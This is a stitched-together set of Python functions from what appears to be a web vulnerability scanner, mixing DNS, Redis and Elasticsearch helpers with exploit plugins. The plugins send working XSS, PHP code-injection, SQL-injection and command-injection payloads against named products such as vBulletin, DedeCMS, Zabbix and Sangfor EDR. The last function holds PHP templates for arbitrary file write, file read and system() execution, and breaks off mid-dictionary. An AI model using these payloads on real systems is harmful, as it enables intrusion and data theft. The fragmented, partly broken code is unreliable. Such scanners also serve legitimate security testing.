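def test(self, swf):
    """Probe one Flash file for the reflected XSS sink in its ``movieName`` parameter.

    The query string is the URL-encoded form of
    ``"])}catch(e){if(!window.x){window.x=1;alert("xss")}}`` followed by ``//``,
    i.e. a JavaScript break-out injected through the SWF's ``movieName`` value.
    A hit is recorded only when the MD5 of the response body is listed in
    ``self.md5_list`` (presumably the hashes of known-vulnerable SWF builds —
    the payload itself is not what is checked); the raw request/response pair
    is appended to ``self.result``.

    :param swf: path of the .swf file, appended to ``self.url``.
    """
    req = {
        "method": "GET",
        # decoded payload: "])}catch(e){if(!window.x){window.x=1;alert("xss")}}
        "url": self.url + swf + "?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28%22xss%22%29}}//",
        "timeout": 10,
        "allow_redirects": False,
        "verify": False,  # TLS verification is intentionally off for probes
    }
    r = request(**req)
    # request() returns None on transport failure; compare with `is`, not `!=`.
    if r is None or r.status_code != 200:
        return
    if getmd5(r.text) not in self.md5_list:
        return
    parser_ = response_parser(r)
    self.result.append({
        "name": self.name,
        "url": self.url,
        "level": self.level,  # 0:Low 1:Medium 2:High
        "detail": {
            "vulmsg": self.vulmsg,
            "request": parser_.getrequestraw(),
            "response": parser_.getresponseraw(),
        },
    })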
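def verify(self):
    """Probe every URL/body parameter for PHP code injection (eval-style sinks).

    Runs only when the request path has a ``php``-like extension (first three
    characters ``php``) or none at all.  Each payload embeds ``md5(<random>)``;
    a hit is a response that either contains that hash, or matches a PHP
    ``Parse error: syntax error ... in`` message, which shows the parameter
    reached an ``eval`` even though the payload did not execute cleanly.
    Hits are stored with ``self.save`` and the parameter is not probed further.
    """
    if self.dictdata.get("url").get("extension")[:3] not in ["php", ""]:
        return
    parser = dictdata_parser(self.dictdata)
    params = self.dictdata.get("request").get("params").get("params_url") + \
        self.dictdata.get("request").get("params").get("params_body")
    num1 = get_random_num(8)
    num1_md5 = getmd5(num1)
    # Raw string: '\s' was an invalid escape sequence in the plain literal.
    regx = r'Parse error: syntax error,.*?\sin\s'
    parse_error = re.compile(regx, re.I | re.S)
    payloads = (
        "print(md5({}));",
        " print(md5({}));",
        ";print(md5({}));",
        "';print(md5({}));$a='",
        "\";print(md5({}));$a=\"",
        "${{@print(md5({}))}}",
        "${{@print(md5({}))}}\\",
        "'.print(md5({})).'",
    )
    if not params:
        return
    for param in params:
        for payload in payloads:
            # Payloads starting with a bare print(...) are presumably appended
            # ("a") to the current value, the rest overwrite it ("w") — confirm
            # against dictdata_parser.getreqfromparam.
            method = "a" if payload[0] == "p" else "w"
            payload = payload.format(num1)
            req = parser.getreqfromparam(param, text=payload, method=method)
            r = request(**req)
            if r is None:
                continue
            if num1_md5 in r.text:
                self.save(r, param, payload)
                break
            if parse_error.search(r.text):
                self.save(r, param, "search rule: " + regx)
                break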
def verify(self):
    """Check the ``routestring=ajax/render/widget_php`` code-execution route.

    Looks like the vBulletin widget_php check: POST a widget whose ``code``
    prints ``md5(<random>)`` and exits, then look for that hash in a 200
    response.  Skipped when the URL is deeper than the configured ``max_dir``.
    """
    # Directory-depth limit from config.py (max_dir, default 2).
    depth_limit = int(scan_set.get("max_dir", 2)) + 2
    if self.url.count("/") > depth_limit:
        return
    seed = get_random_num(5)
    expected = getmd5(seed).encode()
    body = ("routestring=ajax/render/widget_php&widgetConfig%5bcode%5d="
            "print(md5({rand}))%3bexit%3b").format(rand=seed)
    req = {
        "method": "POST",
        "url": self.url,
        "headers": {"Content-Type": "application/x-www-form-urlencoded"},
        "data": body,
        "timeout": 10,
        "allow_redirects": False,
        "verify": False,
    }
    r = request(**req)
    if r is None or r.status_code != 200 or expected not in r.content:
        return
    parser_ = response_parser(r)
    self.result.append({
        "name": self.name,
        "url": self.url,
        "level": self.level,  # 0:Low 1:Medium 2:High
        "detail": {
            "vulmsg": self.vulmsg,
            "request": parser_.getrequestraw(),
            "response": parser_.getresponseraw(),
        },
    })
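def verify(self):
    """Probe ``viewthread.php`` for code execution via ``GLOBALS[_DCACHE][smilies]`` cookies.

    The ``searcharray`` cookie carries the pattern ``/.*/eui`` and
    ``replacearray`` a ``print_r(md5(<random>))`` replacement; if the server
    evaluates the replacement (presumably a ``preg_replace`` ``/e`` sink) the
    hash shows up in the body.  Only characters 10..20 of the hash are
    matched.  Skipped beyond the configured directory depth.
    """
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    num = get_random_num(4)
    num_md5 = getmd5(num)
    req = {
        "method": "GET",
        "url": self.url + "viewthread.php?tid=10",
        # captured request headers (cookies etc.) deliberately not reused here
        "cookies": {
            "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Bsearcharray%5D": "/.*/eui",
            "GLOBALS%5B_DCACHE%5D%5Bsmilies%5D%5Breplacearray%5D": "print_r(md5({}))".format(num),
        },
        "timeout": 10,
        "verify": False,
    }
    r = request(**req)
    # request() returns None on transport failure; use `is`, not `!=`.
    if r is None or r.status_code != 200 or num_md5[10:20].encode() not in r.content:
        return
    parser_ = response_parser(r)
    self.result.append({
        "name": self.name,
        "url": parser_.geturl(),
        "level": self.level,  # 0:Low 1:Medium 2:High
        "detail": {
            "vulmsg": self.vulmsg,
            "request": parser_.getrequestraw(),
            "response": parser_.getresponseraw(),
        },
    })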
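def is_wildcard_dns(domain, istopdomain=False, level=1):
    '''
    Report whether a zone answers for arbitrary sub-labels (wildcard DNS).

    domain: like baidu.com or www.baidu.com
    istopdomain: True  --> domain is baidu.com and is used as-is
                 False --> domain is www.baidu.com; the first label is stripped
    level: 1 = first random probe; if it resolves, a second probe with a
           different label is made at level 2, and only that one records a
           positive result.
    return: True / False, or None when nothing is left after stripping.

    Results are cached in the Redis sets dns_wildcard_true / dns_wildcard_false
    keyed by md5(domain).  Any resolver error (NXDOMAIN included) is treated
    as "not wildcard".
    '''
    if not istopdomain:
        domain = ".".join(domain.split(".")[1:])
    if domain == "":
        return None
    # NOTE(review): `red` is not bound in this function (a local
    # `red = getredis()` had been commented out) — it must be a module-level
    # connection; sibling helpers create one per call.  Confirm.
    key = getmd5(domain)
    if red.sismember("dns_wildcard_true", key):
        return True
    if red.sismember("dns_wildcard_false", key):
        return False
    try:
        r = dns.resolver.Resolver(configure=False)
        r.nameservers = others.dns_servers
        # A label that should not exist; any answer suggests a wildcard.
        r.query('myscan-not-%s-test.%s' % (get_random_str(4).lower(), domain))
        if level == 1:
            # Confirm with a second, different label.  The result of this
            # call used to be discarded, so a level-1 caller got None.
            # NOTE(review): `wildcard_test` is presumably this function's
            # former name — confirm it is the intended target.
            return wildcard_test('any-sub-to.%s' % domain, istopdomain, 2)
        if level == 2:
            red.sadd("dns_wildcard_true", key)
            return True
        return None
    except Exception:
        red.sadd("dns_wildcard_false", key)
        return False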
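def verify(self):
    """Probe ``tag_test_action.php`` for template code execution (DedeCMS-style ``runphp`` field).

    The ``partcode`` parameter carries a ``{dede:field ... runphp='yes'}`` tag
    whose body should echo the MD5 of a random number; characters 10..20 of
    that hash in a 200 response are the hit signal.  Captured request headers
    (cookies etc.) are reused.  Skipped beyond the configured directory depth.
    """
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    random_str = get_random_num(4)
    # NOTE(review): the tag body is "echo md5NNNN;" — not a call to md5().
    # As written the expected hash can never be emitted; it probably needs
    # "md5%28" + str(random_str) + "%29" (i.e. md5(NNNN)).  Left unchanged
    # pending confirmation against the target.
    req = {
        "method": "GET",
        "url": self.url + "tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5" + str(random_str) + ";{/dede:field}",
        "headers": self.dictdata.get("request").get("headers"),
        "timeout": 10,
        "verify": False,
        "allow_redirects": True,
    }
    r = request(**req)
    # request() returns None on transport failure; use `is`, not `!=`.
    if r is None or r.status_code != 200:
        return
    if getmd5(str(random_str))[10:20].encode() not in r.content:
        return
    parser_ = response_parser(r)
    self.result.append({
        "name": self.name,
        "url": parser_.geturl(),
        "level": self.level,  # 0:Low 1:Medium 2:High
        "detail": {
            "vulmsg": self.vulmsg,
            "request": parser_.getrequestraw(),
            "response": parser_.getresponseraw(),
        },
    })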
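def verify(self):
    """Probe the ``index.php?c=api&m=data2`` route for SQL injection.

    Sends ``param=action=sql sql='select md5(<random>)'`` with the fixed
    ``auth`` value the route expects and looks for characters 10..20 of the
    hash in a 200 response.  Captured request headers (cookies etc.) are
    reused.  Skipped beyond the configured directory depth.
    """
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    random_int = get_random_num(5)
    # Bug fix: "&param=" had been mangled to "¶m=" (HTML-entity damage to
    # "&para" + "m"), so the whole injection was sent inside the auth value
    # and the `param` argument never reached the target.
    req = {
        "method": "GET",
        "url": self.url + "index.php?c=api&m=data2&auth=582f27d140497a9d8f048ca085b111df&param=action=sql%20sql=%27select%20md5({})%27".format(random_int),
        "headers": self.dictdata.get("request").get("headers"),
        "timeout": 10,
        "allow_redirects": False,
        "verify": False,
    }
    r = request(**req)
    # request() returns None on transport failure; use `is`, not `!=`.
    if r is None or r.status_code != 200:
        return
    if getmd5(random_int)[10:20].encode() not in r.content:
        return
    parser_ = response_parser(r)
    self.result.append({
        "name": self.name,
        "url": self.url,
        "level": self.level,  # 0:Low 1:Medium 2:High
        "detail": {
            "vulmsg": self.vulmsg,
            "request": parser_.getrequestraw(),
            "response": parser_.getresponseraw(),
        },
    })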
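def verify(self):
    """Probe ``jsrpc.php`` (Zabbix-style) for error-based SQL injection.

    ``profileIdx2`` carries ``updatexml(0,concat(0xa,md5(<random>)),0)``; a
    MySQL XPath error would echo the hash, and characters 10..20 of it in a
    200 response are the hit signal.  Captured request headers (cookies etc.)
    are reused.  Skipped beyond the configured directory depth.
    """
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    num = get_random_num(4)
    num_md5 = getmd5(num)
    req = {
        "method": "GET",
        "url": self.url + "jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,md5({})),0)".format(num),
        "headers": self.dictdata.get("request").get("headers"),  # keep cookies etc.
        "timeout": 10,
        "verify": False,
    }
    r = request(**req)
    # request() returns None on transport failure; use `is`, not `!=`.
    if r is None or r.status_code != 200 or num_md5[10:20].encode() not in r.content:
        return
    parser_ = response_parser(r)
    self.result.append({
        "name": self.name,
        "url": parser_.geturl(),
        "level": self.level,  # 0:Low 1:Medium 2:High
        "detail": {
            "vulmsg": self.vulmsg,
            "request": parser_.getrequestraw(),
            "response": parser_.getresponseraw(),
        },
    })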
def is_perfile_doned(self):
    """Return True if this file-level key was already seen; otherwise record it and return False.

    The key is characters 10..20 of the MD5 of ``self.getperfile()``, kept in
    the Redis set named by ``self.keys["perfile"]``.
    """
    fingerprint = getmd5(self.getperfile())[10:20]
    redis_key = self.keys.get("perfile")
    if self.red.sismember(redis_key, fingerprint):
        return True
    self.red.sadd(redis_key, fingerprint)
    return False
def http_md5(self, dictdata):
    """Build the Elasticsearch document id (an MD5 hex string) for one captured request.

    The id hashes ``protocol-host-port-method-path-argnames``.  When
    ``db_set["es_uniq"]`` is falsy the concatenated argument values are
    appended as well, so requests that differ only in values get distinct ids.
    """
    method = dictdata.get("request").get("method")
    names, values = self.getallargs(dictdata)
    base = "{protocol}-{host}-{port}-{method}-{path}-{argsname}".format(
        argsname="".join(names), method=method, **dictdata.get("url"))
    if db_set.get("es_uniq"):
        return getmd5(base)
    return getmd5(base + "-" + "".join(values))
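def verify(self):
    """Error-based SQL injection probe over every URL and body parameter.

    Skips extensions in ``notAcceptedExt`` and bails out when the unmodified
    response already trips ``self.search`` (a baseline DB error would make
    every probe look like a hit).  Each parameter gets a quote/paren fuzz
    probe checked with ``self.search``, then MySQL / PostgreSQL / MSSQL
    error-reporting payloads that embed ``md5(<random>)``; characters 10..20
    of that hash in the response are the hit signal.  Probing stops at the
    first hit per parameter.  Cookie injection is not implemented.
    """
    if self.dictdata.get("url").get("extension") in notAcceptedExt:
        return
    parser = dictdata_parser(self.dictdata)
    # Baseline check on the original response body.
    if self.search(parser.getresponsebody(), "Null payload , errors in response text "):
        return
    random_num = get_random_num(8)
    random_num_md5 = getmd5(random_num)
    # (payload, expected_md5 or None, method).  method "a" presumably appends
    # to the existing value and "w" replaces it — confirm in dictdata_parser.
    # Exact duplicate extractvalue entries of the original list were dropped.
    payloads = [
        ('鎈\'"\\(', None, "a"),
        ('"and/**/extractvalue(1,concat(char(126),md5({})))and"'.format(random_num), random_num_md5, "a"),
        ("'and/**/extractvalue(1,concat(char(126),md5({})))and'".format(random_num), random_num_md5, "a"),
        ("'and(select'1'from/**/cast(md5({})as/**/int))>'0".format(random_num), random_num_md5, "a"),
        ('"and(select\'1\'from/**/cast(md5({})as/**/int))>"0'.format(random_num), random_num_md5, "a"),
        ("'and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))>'0".format(random_num), random_num_md5, "a"),
        ('"and/**/convert(int,sys.fn_sqlvarbasetostr(HashBytes(\'MD5\',\'{}\')))>"0'.format(random_num), random_num_md5, "a"),
        ("/**/and/**/cast(md5('{}')as/**/int)>0".format(random_num), random_num_md5, "a"),
        ("convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".format(random_num), random_num_md5, "w"),
        ("extractvalue(1,concat(char(126),md5({})))".format(random_num), random_num_md5, "w"),
    ]
    params = self.dictdata.get("request").get("params").get("params_url") + \
        self.dictdata.get("request").get("params").get("params_body")
    if not params:
        return
    for param in params:
        for payload, search_str, method in payloads:
            req = parser.getreqfromparam(param, method, payload)
            r = request(**req)
            if r is None:
                # transport failure; previously None was handed to self.search
                continue
            if search_str is None:
                hit = self.search(r, payload)
            else:
                hit = self.search_md5(r, random_num_md5[10:20], payload)
            if hit:
                break
    # cookie injection: not implemented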
def verify(self): dictdata = self.dictdata # 把请求体和响应体 base64解码,便于搜索 request_raw = base64.b64decode(self.dictdata.get("request").get("raw").encode("utf8")) response_raw = base64.b64decode(self.dictdata.get("response").get("raw").encode("utf8")) dictdata["request"]["raw"] = request_raw.decode("utf-8", errors="ignore") dictdata["response"]["raw"] = response_raw.decode("utf-8", errors="ignore") dictdata["request"]["headers"] = str(dictdata["request"]["headers"]) dictdata["response"]["headers"] = str(dictdata["response"]["headers"]) if "others" in dictdata.keys(): del dictdata["others"] if "filter" in dictdata.keys(): del dictdata["filter"] dictdata["source"] = "burp" dictdata["url"]["ip"] = self.getaddr(dictdata.get("url").get("host")) dictdata["url"]["pathroot"] = "{protocol}://{host}:{port}/".format(**dictdata.get("url")) if dictdata["url"]["extension"] == "ico": body = response_raw[int(dictdata.get("response").get("bodyoffset")):] dictdata["url"]["icon_hash"] = str(mmh3.hash(base64.b64encode(body))) actions = [] action = { "_index": "httpinfo", "_id": self.http_md5(dictdata), "_source": dictdata } actions.append(action) # get url from html urls_from_html = self.get_html_url(dictdata["url"]["url"], response_raw[int(dictdata.get("response").get("bodyoffset")):].decode( "utf-8", "ignore"), dictdata["response"]["mime_inferred"]) logger.debug("urls_from_html total:{}".format(len(urls_from_html))) if urls_from_html: mythread(self.getaddr, self.hosts, 50) for url_data in urls_from_html: url_data["ip"] = self.dict_host_ip[url_data["host"]] action_ = { "_index": "httpinfo", "_id": getmd5("{ip}{pathroot}{path}".format(**url_data)), "_source": {"url": url_data, "source": "html", "ts": dictdata["ts"]} } actions.append(action_) try: helpers.bulk(others.es_conn, actions) logger.debug("es insert {} lines".format(len(actions))) except Exception as ex: logger.warning("Plugin {} get error:{}".format(__name__, ex)) traceback.print_exc()
def find_ip(self):
    """Resolve ``self.domain`` to a comma-joined address string, cached in Redis.

    An IP literal is returned unchanged.  Otherwise the value cached under
    ``md5("domain_to_ip_" + domain)`` is returned when present; else
    ``self.query`` is run over a copy of ``others.dns_servers`` (6 threads),
    the collected ``self.msg`` entries are joined with "," and the string is
    stored and returned.  An empty result is stored too but, being falsy,
    does not short-circuit later calls.
    """
    if is_ipaddr(self.domain):
        return self.domain
    cache = getredis()
    cache_key = getmd5("domain_to_ip_" + self.domain)
    cached = cache.get(cache_key)
    if cached:
        return cached.decode()
    mythread(self.query, copy.deepcopy(others.dns_servers), 6)
    resolved = ",".join(list(self.msg))
    cache.set(cache_key, resolved)
    return resolved
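def args_inject(self, data):
    """Thread worker for one (request, payload) pair built by ``verify``.

    ``data`` is ``(req, payload, search_str, random_num_md5, param)``.  A
    parameter already in ``self.found`` is skipped so each one is reported
    at most once.  ``search_str`` None marks the quote-fuzz probe, checked
    with ``self.search``; otherwise the response is checked for characters
    10..20 of ``random_num_md5``.  Note that workers run concurrently: two of
    them can pass the ``in self.found`` check for the same parameter before
    either appends, so a duplicate report is possible but harmless.
    """
    req, payload, search_str, random_num_md5, param = data
    param_key = getmd5(str(param))
    if param_key in self.found:
        return
    r = request(**req)
    if r is None:
        return
    if search_str is None:
        hit = self.search(r, payload, param.get("name", ""))
    else:
        hit = self.search_md5(r, random_num_md5[10:20], payload)
    if hit:
        self.found.append(param_key)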
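def output(self, msg, insert=False):
    """Rate-limit findings to one per (scheme://host[:port], msg).

    With ``insert`` False: return True when nothing has been recorded for
    this key yet (the caller may report), False otherwise.  With ``insert``
    True: record the key and return None.  The key is 8 hex characters
    (offset 10) of the MD5 of ``"<origin> <msg>"``, stored in the Redis set
    ``myscan_max_output``; 32 bits leaves a small collision chance, which
    only ever suppresses a report.
    """
    origin = "/".join(self.url.split("/")[:3])
    key = getmd5(origin + " " + msg)[10:18]
    red = getredis()
    if insert:
        red.sadd("myscan_max_output", key)
        return None
    if red.sismember("myscan_max_output", key):
        # already emitted once for this origin/msg — stop testing/outputting
        return False
    return True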
def is_perfolder_doned(self):
    """Return the folders from ``self.getperfolders()`` not yet seen, recording each.

    Each folder is keyed by characters 10..20 of its MD5 in the Redis set
    ``self.keys["perfolder"]``; folders already present are omitted from the
    result.  Returns [] when there are no folders.
    """
    folders = self.getperfolders()
    if not folders:
        return []
    redis_key = self.keys.get("perfolder")
    fresh = []
    for folder in folders:
        fingerprint = getmd5(folder)[10:20]
        if self.red.sismember(redis_key, fingerprint):
            continue
        self.red.sadd(redis_key, fingerprint)
        fresh.append(folder)
    return fresh
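def header_inject(self, data):
    """Thread worker for one header-injection probe built by ``verify``.

    ``data`` is ``(req, (payload, search_str, header_name, msg))``.  The
    probe is skipped when ``self.output(msg)`` says this origin/msg was
    already reported.  ``search_str`` None marks the quote-fuzz probe,
    checked with ``self.search``; otherwise the response is checked for the
    MD5 of the random seed embedded in the payload (``md5(N)``,
    ``md5('N')`` or ``HashBytes('MD5','N')``).  Previously a *fresh* random
    number was hashed here, so the MD5 branch could never match the payload.
    """
    req, data_ = data
    payload, search_str, k, msg = data_
    if not self.output(msg):
        return
    r = request(**req)
    if r is None:
        return
    if search_str is None:
        if self.search(r, payload, "headers's {}".format(k)):
            self.output(msg, True)
        return
    seed = re.search(r"(?:md5\('?|HashBytes\('MD5',')(\d+)", payload)
    if seed is None:
        logger.debug("header_inject: no md5 seed in payload {!r}".format(payload))
        return
    random_num_md5 = getmd5(int(seed.group(1)))
    if self.search_md5(r, random_num_md5[10:20], payload):
        self.output(msg, True)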
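def can_output(self, msg, insert=False):
    '''
    Gate a finding so it is reported at most once per ``msg``.

    msg : should be url+somename
    insert False: return True if ``msg`` has not been recorded yet, else
                  log and return False.
    insert True : record ``msg`` (return value None).
    Keys are md5(msg) in the Redis set ``myscan_max_output``.
    '''
    key = getmd5(msg)
    red = getredis()
    if insert:
        red.sadd("myscan_max_output", key)
        return None
    if red.sismember("myscan_max_output", key):
        logger.debug("{} 输出个数已达一次,不再测试输出".format(msg))
        return False  # already reported once; do not test/output again
    return True  # may output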
def is_perscheme_doned(self):
    """Return True if this request scheme was already seen; otherwise record it and return False.

    The scheme key is md5 of protocol, host, port, method, path and the
    concatenated argument names — joined with no separator, unlike
    ``http_md5`` — kept in the Redis set ``self.keys["perscheme"]``.
    """
    url = self.dictdata.get("url")
    method = self.dictdata.get("request").get("method")
    argsname = "".join(self.getallargs())
    fingerprint = getmd5("{}{}{}{}{}{}".format(
        url.get("protocol"), url.get("host"), url.get("port"),
        method, url.get("path"), argsname))
    redis_key = self.keys.get("perscheme")
    if self.red.sismember(redis_key, fingerprint):
        return True
    self.red.sadd(redis_key, fingerprint)
    return False
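def getaddr(self, domain):
    """Resolve ``domain`` to one address, caching in Redis and ``self.dict_host_ip``.

    IP literals map to themselves.  The Redis key is ``md5("dnsdata_<domain>")``;
    an empty stored value is a negative cache entry and yields None.  On a
    miss the *last* ``socket.getaddrinfo`` entry is used — that may be an
    IPv4 or IPv6 address depending on the resolver.  Any lookup failure is
    cached as "" and returns None (best-effort, never raises).
    """
    if is_ipaddr(domain):
        self.dict_host_ip[domain] = domain
        return domain
    key = getmd5("dnsdata_{}".format(domain))
    cached = self.red.get(key)
    if cached == b"":
        # negative cache entry from an earlier failed lookup
        self.dict_host_ip[domain] = None
        return None
    if cached is not None:
        ip = cached.decode()
        self.dict_host_ip[domain] = ip
        return ip
    try:
        result = socket.getaddrinfo(domain, None)
        domain_ip = result[-1][-1][0]
    except Exception as ex:
        # Deliberate best-effort: resolver errors, bad IDNA names etc. are
        # remembered as "" so the host is not retried every time.
        logger.debug("getaddr {} failed: {}".format(domain, ex))
        self.dict_host_ip[domain] = None
        self.red.set(key, "")
        return None
    self.dict_host_ip[domain] = domain_ip
    self.red.set(key, domain_ip)
    return domain_ip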
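def verify(self):
    """Probe every URL/body parameter for OS command, PHP and template injection.

    Two random 4-digit numbers are combined in shell (``expr``), Windows
    (``set /A``), PHP (``var_dump(md5())``) and template-engine expressions;
    a hit is the expected sum, product or MD5 appearing in the response
    text.  Because the sum is a short decimal number, it may occur in a page
    by chance — treat hits from the arithmetic payloads with care.  Probing
    stops at the first hit per parameter.

    Bug fix: the ``"{}*{}" % num1`` entry raised ``TypeError`` while the
    payload tuple was being built, so this check never sent a single request.
    """
    if self.dictdata.get("url").get("extension").lower() in notAcceptedExt:
        return
    parser = dictdata_parser(self.dictdata)
    params = self.dictdata.get("request").get("params").get("params_url") + \
        self.dictdata.get("request").get("params").get("params_body")
    num1 = get_random_num(4)
    num2 = get_random_num(4)
    num1_num2 = num1 + num2
    num1num2 = num1 * num2
    num1_md5 = getmd5(num1)
    # "method": "a" presumably appends to the current value, "w" replaces it —
    # confirm in dictdata_parser.getreqfromparam.
    payloads = (
        {"cmd": "\nexpr {} + {}\n".format(num1, num2), "show": num1_num2, "method": "a"},
        {"cmd": "|expr {} + {}".format(num1, num2), "show": num1_num2, "method": "a"},
        {"cmd": "$(expr {} + {})".format(num1, num2), "show": num1_num2, "method": "a"},
        {"cmd": "&set /A {}+{}".format(num1, num2), "show": num1_num2, "method": "a"},
        {"cmd": "${@var_dump(md5(%s))};" % num1, "show": num1_md5, "method": "w"},
        {"cmd": "{}*{}".format(num1, num2), "show": num1num2, "method": "w"},
        {"cmd": "'-var_dump(md5(%s))-'" % num1, "show": num1_md5, "method": "w"},
        {"cmd": "/*1*/{{%s+%s}}" % (num1, num2), "show": num1_num2, "method": "w"},
        {"cmd": "${%s+%s}" % (num1, num2), "show": num1_num2, "method": "w"},
        {"cmd": "${(%s+%s)?c}" % (num1, num2), "show": num1_num2, "method": "w"},
        {"cmd": "#set($c=%s+%s)${c}$c" % (num1, num2), "show": num1_num2, "method": "w"},
        {"cmd": "<%- {}+{} %>".format(num1, num2), "show": num1_num2, "method": "w"},
    )
    if not params:
        return
    for param in params:
        for payload in payloads:
            req = parser.getreqfromparam(param, text=payload.get("cmd"), method=payload.get("method"))
            r = request(**req)
            if r is None or str(payload.get("show")) not in r.text:
                continue
            parser_ = response_parser(r)
            self.result.append({
                "name": self.name,
                "url": parser_.geturl(),
                "level": self.level,  # 0:Low 1:Medium 2:High
                "detail": {
                    "vulmsg": self.vulmsg,
                    "param": param.get("name"),
                    "payload": payload,
                    "request": parser_.getrequestraw(),
                    "response": parser_.getresponseraw(),
                },
            })
            break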
def verify(self):
    """Check the Sangfor EDR ``slog_client`` endpoint for shell command injection.

    Posts a JSON ``params`` value that closes the quoted argument and pipes
    ``echo -n <random> | md5sum``; the MD5 of that random string in the
    response body is the hit signal.  The fixed ``token`` query value is
    part of the request shape.  Captured request headers (cookies etc.) are
    reused.  Skipped beyond the configured directory depth.
    """
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    marker = get_random_str(6)
    expected = getmd5(marker).encode()
    body = r'''{"params":"w=123\"'1234123'\"|echo -n %s |md5sum"}''' % (marker)
    req = {
        "method": "POST",
        "url": self.url + "api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9",
        "headers": self.dictdata.get("request").get("headers"),  # keep cookies etc.
        "timeout": 10,
        "data": body,
        "allow_redirects": False,
        "verify": False,
    }
    r = request(**req)
    if r is None or expected not in r.content:
        return
    parser_ = response_parser(r)
    self.result.append({
        "name": self.name,
        "url": self.url,
        "level": self.level,  # 0:Low 1:Medium 2:High
        "detail": {
            "vulmsg": self.vulmsg,
            "request": parser_.getrequestraw(),
            "response": parser_.getresponseraw(),
        },
    })
def is_cdn_domain(domain):
    '''
    return True ,False

    NOTE(review): this body is a copy of is_wildcard_dns and does not
    implement a CDN check.  Inside the try block `level` and `istopdomain`
    are not defined in this scope: when the random probe resolves the
    NameError is swallowed by `except Exception`; when it does not resolve
    the resolver error is swallowed.  Either way the function adds
    md5(domain) to the "dns_wildcard_false" set — the cache that
    is_wildcard_dns reads, so a call here marks the domain as non-wildcard
    there — and returns False.  The "domain_cdn_true"/"domain_cdn_false"
    sets consulted at the top are never written by this function.  Needs a
    real implementation before callers can rely on it.
    '''
    red = getredis()
    key = getmd5(domain)
    if red.sismember("domain_cdn_true", key):
        return True
    if red.sismember("domain_cdn_false", key):
        return False
    try:
        r = dns.resolver.Resolver(configure=False)
        r.nameservers = others.dns_servers
        answers = r.query('myscan-not-%s-test.%s' % (get_random_str(4).lower(), domain))
        ips = ', '.join(sorted([answer.address for answer in answers]))
        # `level` / `istopdomain` are unbound here (see note above).
        if level == 1:
            wildcard_test('any-sub-to.%s' % domain, istopdomain, 2)
        elif level == 2:
            red.sadd("dns_wildcard_true", key)
            return True
    except Exception as e:
        red.sadd("dns_wildcard_false", key)
        return False
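def verify(self):
    """Probe ``faq.php?action=grouppermission`` for error-based SQL injection.

    The ``gids[100][0]`` value closes the query and adds a duplicate-key
    (``floor(rand(0)*2)`` / ``group by``) subquery that concatenates
    ``md5(<random>)`` into the error; characters 10..20 of the hash in a 200
    response are the hit signal.  Note the PoC subquery also selects
    ``user`` from ``mysql.user`` — the response may therefore expose an
    account name, so handle stored responses accordingly.  Skipped beyond
    the configured directory depth.
    """
    if self.url.count("/") > int(scan_set.get("max_dir", 2)) + 2:
        return
    num = get_random_num(4)
    num_md5 = getmd5(num)
    req = {
        "method": "GET",
        "url": self.url + "faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat((select%20concat(user,0x3a,md5({}),0x3a)%20from%20mysql.user%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23".format(num),
        # captured request headers (cookies etc.) deliberately not reused here
        "timeout": 10,
        "allow_redirects": False,
        "verify": False,
    }
    r = request(**req)
    # request() returns None on transport failure; use `is`, not `!=`.
    if r is None or r.status_code != 200 or num_md5[10:20].encode() not in r.content:
        return
    parser_ = response_parser(r)
    self.result.append({
        "name": self.name,
        "url": parser_.geturl(),
        "level": self.level,  # 0:Low 1:Medium 2:High
        "detail": {
            "vulmsg": self.vulmsg,
            "request": parser_.getrequestraw(),
            "response": parser_.getresponseraw(),
        },
    })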
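def language_init(self):
    """Register the PHP code-evaluation actions and the injection contexts.

    Each action names the ``call`` it is delivered through (inject → render
    → evaluate → execute / evaluate_blind → execute_blind → shells) and a
    template whose ``%(...)s`` placeholders the engine fills.  Payloads that
    carry arbitrary data (``write``, ``execute``, ``evaluate_blind``,
    ``execute_blind``) are sent URL-safe base64-encoded and restored on the
    target with ``strtr``/``str_pad`` to avoid quoting problems; ``%%4`` is
    a literal ``%4`` after formatting.  The ``test_*``/``*_expected`` pairs
    are the probes that confirm each capability: a 10-character MD5 prefix,
    ``PHP_OS``, an echoed random string.  Contexts describe how to break out
    of the surrounding PHP (statement, expression, comment block).

    Bug fix: ``test_os_expected`` is now a raw string — ``'\\w'`` in a plain
    literal was an invalid escape sequence.
    """
    self.update_actions({
        'render': {
            'call': 'inject',
            'render': """%(code)s""",
            'header': """print_r('%(header)s');""",
            'trailer': """print_r('%(trailer)s');""",
            'test_render': 'print(md5(%(r1)s));' % {
                'r1': rand.randints[0]
            },
            'test_render_expected': '%(r1)s' % {
                'r1': getmd5(rand.randints[0])[0:10]
            }
        },
        'write': {
            'call': 'evaluate',
            'write': """$d="%(chunk_b64)s"; file_put_contents("%(path)s", base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)),FILE_APPEND);""",
            'truncate': """file_put_contents("%(path)s", "");"""
        },
        'read': {
            'call': 'evaluate',
            'read': """print(base64_encode(file_get_contents("%(path)s")));"""
        },
        'md5': {
            'call': 'evaluate',
            'md5': """is_file("%(path)s") && print(md5_file("%(path)s"));"""
        },
        'evaluate': {
            'call': 'render',
            'evaluate': """%(code)s""",
            'test_os': 'echo PHP_OS;',
            'test_os_expected': r'^[\w-]+$'
        },
        'execute': {
            'call': 'evaluate',
            'execute': """$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d,'-_','+/'),strlen($d)%%4,'=',STR_PAD_RIGHT)));""",
            'test_cmd': bash.echo % {
                's1': rand.randstrings[2]
            },
            'test_cmd_expected': rand.randstrings[2]
        },
        'blind': {
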